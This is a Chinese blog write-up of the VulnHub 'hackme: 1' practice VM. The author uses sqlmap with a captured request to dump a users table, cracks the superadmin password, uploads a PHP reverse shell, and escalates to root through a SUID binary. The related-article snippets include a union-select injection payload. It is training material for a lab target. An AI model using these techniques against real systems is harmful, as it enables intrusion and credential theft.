Vulnhub靶机hackme: 1 writeup

最新推荐文章于 2023-06-13 18:20:18 发布
最新推荐文章于 2023-06-13 18:20:18 发布
阅读量2.2k 收藏 1
点赞数
分类专栏: vulnhub靶机 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xingjinhao123/article/details/122490435
版权

下载地址:https://www.vulnhub.com/entry/hackme-1,330/

在这里插入图片描述

信息搜集

获取IP地址

在这里插入图片描述

扫描端口

在这里插入图片描述

80端口

首页是一个登录页面
在这里插入图片描述
发现有注册页面,注册一个账号admin:password,并且登录成功
在这里插入图片描述
登录成功之后的页面,是一个查阅图书的页面
在这里插入图片描述
尝试使用SQL注入

sqlmap -r sqlmap.txt  --batch

在这里插入图片描述
sqlmap.txt里面的内容,通过抓包获取的
在这里插入图片描述

sqlmap.txt

POST /welcome.php HTTP/1.1
Host: 192.168.1.150
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
Origin: http://192.168.1.150
Connection: close
Referer: http://192.168.1.150/welcome.php
Cookie: PHPSESSID=r0chapo33qtu1kt7qtv9rolpkg
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1

search=1

看到是存在注入的
注入爆出数据库

sqlmap -r sqlmap.txt  --batch --dbs

在这里插入图片描述
在webapphacking数据库里面得到了我们想要的信息

sqlmap -r sqlmap.txt  --batch -D webapphacking --tables --batch

在这里插入图片描述

sqlmap -r sqlmap.txt  --batch -D webapphacking -T users --dump --batch

在这里插入图片描述
在这里我们看到它有很有个用户名密码,有一个超级管理员用户superadmin
superadmin用户的密码需要在在线网站解一下

解密网站:https://www.somd5.com/

在这里插入图片描述

反弹shell

使用用户名:superadmin密码:Uncrackable登录得到一个上传页面
在这里插入图片描述
尝试上传一个php文件,发现可以上传
在这里插入图片描述
上传一个反弹shell的PHP文件,上传成功
在这里插入图片描述
在这里插入图片描述
kali开启监听
在这里插入图片描述
浏览器访问php-reverse-shell.php
在这里插入图片描述
监听成功,成功拿到shell
在这里插入图片描述

提权

使用python打开bash的shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述
使用find命令查找具有SUID权限的二进制文件

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述
在这里发现/home/legacy/touchmenot含有SUID的权限
执行该文件发现已经获取了root权限
在这里插入图片描述
到这里成功完成了该靶机!
本文所有用到的工具都可以关注微信公众号“网络安全学习爱好者”联系公众客服免费领取!
在这里插入图片描述

Sword-豪
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
HACKME:1靶机
JKding123的博客
10-22 890
HACKME:1 靶机地址 https://www.vulnhub.com/entry/hackme-1,330/ 靶机IP:192.168.3.142 kaliIP:192.168.3.133 主机发现 root@kali:~# arp-scan -l 端口扫描 开放了80、22端口 目录扫描 root@kali:~/dirsearch# python3 dirsearch.py -u http://192.168.3.142/ -e * 依次访问试试 http://192.168.3.142/lo
靶机渗透 hackme-1(详解,适合新手)
君莫hacker的博客
09-05 5964
靶机hackme-1的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘SQL注入文件上传漏洞三、 漏洞利用反弹shell方法一:一句话木马,蚁剑连接反弹shell方法二:system命令执行四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布时间 18 Jul 2019 作者 x4bx54 难度 简单 靶机基本介绍: “hackme”是一个
hackme1新手教学
w2411313的博客
10-13 6623
15.输入-1' union select group_concat(user),group_concat(pasword),3 from users#,查看user和password的具体信息,发现用户名其中一个是superadmin,最有可能为管理员账户,得到用户名和密码,但是密码被md5加密。>,点击选择文件进行上传,然后点击upload image。12.输入-1' union select database(),2,3# ,查看数据库具体信息,得到数据库名称为webapphacking。
vulnstack1--红队靶机
niqiu320的博客
05-31 570
思路流程: 环境搭建(靶机环境) 一、前渗透的阶段 首先信息收集 getshell 尝试内网信息收集 二、后渗透阶段 (一)msf和cs联动 内网信息收集 三、攻击域(内网渗透) (一)提权 (二)横向移动 攻击域控 ...
VulnHub-hackme:1漏洞利用流程
2301_76786857的博客
06-13 202
靶机地址靶机IP:192.168.245.131测试机系统:kali、win10测试机IP:192.168.245.1291.下载并导入靶机打开vmware——文件—打开—hackme.ova—导入虚拟机2.查看网络适配器将靶机网络适配器改为NAT模式3.启动靶机点击 ▶靶机,开启成功。
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
vulnhub靶机实战-My-cmsms靶机
最新发布
09-29
vulnhub靶机实战-My-cmsms靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
hackme-1靶机渗透详解
大熊
06-12 413
hackme”是一个初学者难度等级框。目标是通过web漏洞获得有限的权限访问,然后权限升级为root。 此靶机重点在于SQL注入,爆出管理员用户及密码。
Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权
weixin_50815573的博客
03-03 4460
Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权 搭建测试靶机 下载地址:DC: 3.2 ~ VulnHub靶机DC-3 ip:192.168.1.106(NAT连接) 攻击机kali linux ip:192.168.1.237 信息收集 使用:nmap -sP 192.168.0.0/24 进行扫描找到目标靶机 对目标靶机进行端口扫描 利用nmap对目标主机进行端口扫描,发现开放端口:80 使用命令:nmap -A -p- -T4 192.168.1.106
靶机练习 No.20 Vulnhub靶机 jangow 01 ftp登录 命令执行写入webshell php反弹shell 45010.c内核漏洞提权
YouthBelief的博客
01-20 3053
0x00 环境准备 下载链接 https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova 靶机介绍 难度:简单 上架时间:2021年11月4日 提示信息:The secret to this box is enumeration! Inquiries jangow2021@gmail.com 靶机配置 virtual box 启动,与kali配置同一网卡。 0x01 信息收集 靶机ip探测 端口服务识别 21/tcp ope
vulnhub靶机 Connect-the-dots
weixin_46107179的博客
03-19 3903
vulnhub靶机 Connect-the-dots 搭建好靶机之后,用攻击机进行扫描,得到相关信息(开放了ftp服务,web服务,nfs以及ssh)
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
vulnhub靶机DC-1
cyzCc的博客
02-15 884
1.启动DC1靶机发现没有登录密码 2.信息收集 主机发现,由于是与主机nat连接,所以需要找到dc1的IP地址 dc1的Mac地址是 nmap -sP 192.168.211.0/24 所以dc1 靶机的ip地址是192.168.211.133 扫描主机上开启的服务 nmap -A 192.168.211.133 -p 1-65535 发现目标开启了22端口和80端口 22端口考虑ssh...
Vulnhub靶机实战——DC-4
冠霖L的博客
09-27 3093
靶机DC-4下载地址:https://download.vulnhub.com/dc/DC-4.zip 描述:从靶机DC-3开始,只有一个入口和一个最终的flag,只有拿到root权限才可以发现最终的flag,DC-4也是一样 环境:Vmware 15 Pro虚拟机软件 DC-4靶机IP地址:192.168.220.138 Kali的IP地址:...
vulnhub靶机-School: 1
臭nana的博客
02-06 2019
1、找到靶机ip:192.168.75.18 nmap -sn 192.168.75.0/24 2、扫描靶机端口 root@chounana:~# nmap -p- -A 192.168.75.18 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.75.18 Host is up (0.00042s latency). Not shown: 65532 closed ports PORT STATE
MS08067 “安全练兵场”战术空袭~
Ms08067安全实验室
10-18 2133
成立"安全练兵场"的目的目前,安全行业热度逐年增加,很多新手安全从业人员在获取技术知识时,会局限于少量的实战中,技术理解得不到升华,只会像个脚本小子照着代码敲命令,遇到实战时自乱阵脚,影响...
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sword-豪

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值